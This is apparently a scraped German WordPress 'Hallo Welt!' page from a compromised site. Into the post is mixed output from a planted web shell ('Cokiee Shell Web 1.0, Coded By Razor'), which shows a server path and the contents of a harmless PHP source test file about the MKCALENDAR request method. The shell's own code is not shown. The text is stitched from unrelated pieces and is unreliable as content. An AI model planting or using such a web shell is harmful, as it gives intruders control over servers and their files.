Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/sapi/cli/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/sapi/cli/tests/bug69953.phpt |
--TEST-- FR #69953 (Support MKCALENDAR request method) --INI-- allow_url_fopen=1 --SKIPIF-- <?php include "skipif.inc"; ?> --FILE-- <?php include "php_cli_server.inc"; php_cli_server_start('echo $_SERVER["REQUEST_METHOD"];'); $context = stream_context_create(['http' => ['method' => 'MKCALENDAR']]); var_dump(file_get_contents("http://" . PHP_CLI_SERVER_ADDRESS, false, $context)); ?> --EXPECT-- string(10) "MKCALENDAR"
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare